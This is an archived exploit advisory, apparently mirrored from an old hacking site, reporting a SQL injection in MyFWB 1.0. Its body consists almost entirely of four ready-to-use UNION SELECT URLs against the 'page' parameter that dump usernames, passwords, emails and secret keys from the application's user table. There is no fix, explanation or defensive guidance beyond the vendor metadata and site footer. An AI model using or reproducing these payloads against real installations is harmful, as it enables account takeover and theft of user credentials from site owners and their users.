AOH :: HP Unsorted M :: VA1325.HTM

MyFWB 1.0 Remote SQL Injection



MyFWB 1.0 Remote SQL Injection
MyFWB 1.0 Remote SQL Injection



MyFWB 1.0 Remote SQL Injection

Author: 0x90
url: www.0x90.com.ar 
Product: MyFWB
download: http://myfwb.co.cc/downloads/myfwb_1.0_FS_edition.zip 
Version: 1.0
URL: http://www.fsoft.co.nr/ 
Vulnerability Class: SQL Injection
contact: Guns[at]0x90[dot]com[dot]ar


Username:
http://host/MyFWB/?page=-0x90+union+select+0,0,username,0+from+user 

Password:
http://host/MyFWB/?page=-0x90+union+select+0,0,password,0+from+user 

Email:
http://host/MyFWB/?page=-0x90+union+select+0,0,useremail,0+from+user 

Secret Key:
http://host/MyFWB/?page=-0x90+union+select+0,0,secret,0+from+user 

The entire AOH site is optimized to look best in Firefox® 3 on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH
We do not send spam. If you have received spam bearing an artofhacking.com email address, please forward it with full headers to abuse@artofhacking.com.